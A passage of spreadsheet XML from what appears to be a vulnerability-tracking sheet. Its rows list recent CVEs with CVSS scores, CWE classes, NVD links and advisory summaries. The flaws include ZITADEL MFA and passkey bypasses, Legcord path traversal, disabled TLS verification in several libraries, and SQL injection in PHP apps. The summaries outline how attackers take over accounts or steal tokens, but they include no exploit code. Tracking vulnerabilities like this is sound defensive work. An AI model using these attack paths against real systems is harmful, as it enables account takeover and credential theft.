          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.15 and 4.x before 4.17.1 contains a missing authentication flaw in the hosted Login V1 UI, whose second-factor enrollment and initialization handlers act on an identify-only session before any primary factor is verified. Attackers knowing only a victim's login name can enroll attacker-controlled TOTP, OTP-SMS, OTP-Email, or U2F factors, overwrite the verified phone number, and enumerate users through discrepant errors.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105210</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105213</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 4.x before 4.17.1 does not check an organization's inactive state during Login V2 authentication, verifying only the individual user's status. Users of a deactivated organization who hold valid credentials, an existing session, or a refresh token can still sign in, create sessions, and obtain or refresh tokens.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105213</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105211</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>ZITADEL before 4.17.1 contains an authentication bypass vulnerability in Login V2 that allows unauthenticated attackers to take over accounts by obtaining OTP codes via the returnCode delivery type. Attackers knowing a login name of a victim with OTP-Email and OTP-SMS enrolled can read both codes from server-action responses to gain MFA-authenticated sessions, including administrator takeover.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105211</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105293</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Legcord 1.1.0 through 1.3.0 contains a path traversal vulnerability in theme IPC handlers that allows script in the Discord page to escape the themes directory via unvalidated theme ids. Attackers running script in the Discord origin, such as through XSS, can abuse themes.folder, themes.uninstall, and themes.install to launch local executables, recursively delete directories, and write files outside the themes directory.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105293</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105220</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>NVD</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is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Twine 2 desktop through 2.12.0 contains a cross-site scripting vulnerability in importStories() that executes markup from imported story files in the editor window. Attackers can craft a story file whose script calls the twineElectron openWithScratchFile IPC bridge to write and open a .bat file, executing code as the user.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105220</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105208</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>7.7</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2026-10-04</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-649</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 4.x before 4.17.3 and 3.x through 3.4.15 protects IdP intent tokens with unauthenticated, malleable encryption, allowing authenticated users to tamper with their own token so it is accepted for another user's external login intent. An attacker who predicts a victim's in-flight intent identifier and wins a timing race can call /v2/idp_intents or /v2/sessions to steal the victim's IdP tokens or hijack their session.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105208</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105212</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>7.5</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2026-10-04</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.14 and 4.x before 4.16.2 contains an authentication bypass in the hosted Login V1 and Login V2 UIs that accepts passkey or other authenticator enrollment on identify-only login sessions, before any primary factor is verified. Unauthenticated attackers knowing only a victim's login name can register an attacker-controlled authenticator and log in as that user, bypassing existing passwords and MFA.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105212</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105219</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>7.5</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2026-10-04</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Mammoth.js 1.3.0 before 1.12.3 contains a regular expression denial of service vulnerability in the style map tokeniser in lib/styles/parser/tokeniser.js due to overlapping regex alternatives. Attackers can supply a crafted .docx with an unterminated quoted string of repeated backslash escapes in mammoth/style-map to block the Node.js event loop.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105219</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105295</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>GitAhead 2.5.0 through 2.7.1 contains an insecure update mechanism that installs downloaded updates without integrity or signature verification and permanently ignores TLS errors after one SSL error dialog. Network attackers presenting an invalid certificate once can intercept later automatic update checks, offer a fake version, and execute code as the user upon installation.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105295</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97307</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in StylemixThemes Cost Calculator Builder cost-calculator-builder allows Retrieve Embedded Sensitive Data.This issue affects Cost Calculator Builder: from n/a through 4.0.17.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97307</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105216</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>go-micro before 6.0.0 contains an improper certificate validation vulnerability that allows network attackers to impersonate services because the shared TLS helper sets InsecureSkipVerify to true by default. Man-in-the-middle attackers can present any certificate to intercept or modify gRPC transport, HTTP and RabbitMQ broker, and Consul or etcd registry traffic, including authentication tokens and credentials.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105216</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105218</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>7.4</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2026-10-04</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>gopay before 1.5.119 disables TLS certificate verification in defaultClient() in pkg/xhttp/client.go, allowing man-in-the-middle attackers to impersonate payment provider APIs. Attackers can present any certificate to read merchant credentials, signatures and transaction data, and modify payment, refund and order query responses.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105218</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105221</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>The gist RubyGem before 6.1.0 contains an improper certificate validation vulnerability that allows on-path attackers to intercept HTTPS traffic because http_connection in lib/gist.rb sets VERIFY_NONE. Attackers can present any certificate to read or modify GitHub API traffic, stealing OAuth tokens and login credentials to read and modify the victim's gists.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105221</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105222</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>7.4</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2026-10-04</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>The alexpechkarev/google-maps Laravel package through 12.16 disables TLS certificate verification by default because the bundled config sets ssl_verify_peer to FALSE, which is passed to CURLOPT_SSL_VERIFYPEER. On-path attackers can present any certificate to intercept Google Maps web-service requests, steal the API key from the query string, and tamper with responses.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105222</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105223</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>maclof kubernetes-client 0.17.0 before 0.32.0 disables TLS certificate verification in parseKubeconfig() and parseKubeconfigFile() when a kubeconfig lacks certificate-authority-data, ignoring insecure-skip-tls-verify. On-path attackers can impersonate the Kubernetes API server to capture Bearer tokens or Basic credentials and tamper with WebSocket or REST API traffic.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105223</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105294</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>7.4</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2026-10-05</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Legcord 1.1.0 through 1.3.0 contains a configuration injection vulnerability that allows script in the Discord page to write any config key via the window.legcord settings.setConfig bridge. Attackers exploiting a Discord XSS can set additionalArguments to persistently add --proxy-server and --ignore-certificate-errors switches, routing all client traffic through an interception proxy.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105294</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105147</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SciPhi-AI R2R up to 3.6.6. This affects an unknown part of the component JWT Secret Handler. This manipulation of the argument DEFAULT_BCRYPT_SECRET_KEY/DEFAULT_NACL_SECRET_KEY causes hard-coded credentials. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105147</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105148</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SciPhi-AI R2R up to 3.6.6. This vulnerability affects unknown code of the file py/shared/abstractions/llm.py of the component Retrieval Completion API Endpoint. Such manipulation of the argument generation_config.api_base leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105148</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105149</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in mooSocial up to 3.2.4. This issue affects some unknown processing of the file /stores/all-products. Performing a manipulation of the argument rating results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105149</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105158</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in RainyGao DocSys up to 2.02.85. The impacted element is the function BaseController.createDBForMysql of the file BaseController.java of the component Database Management. The manipulation of the argument url results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105158</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105166</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>7.3</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2026-10-04</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The affected element is the function insert of the file fooddonateform.php of the component Food Donation Form. Performing a manipulation of the argument image-choice results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105166</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
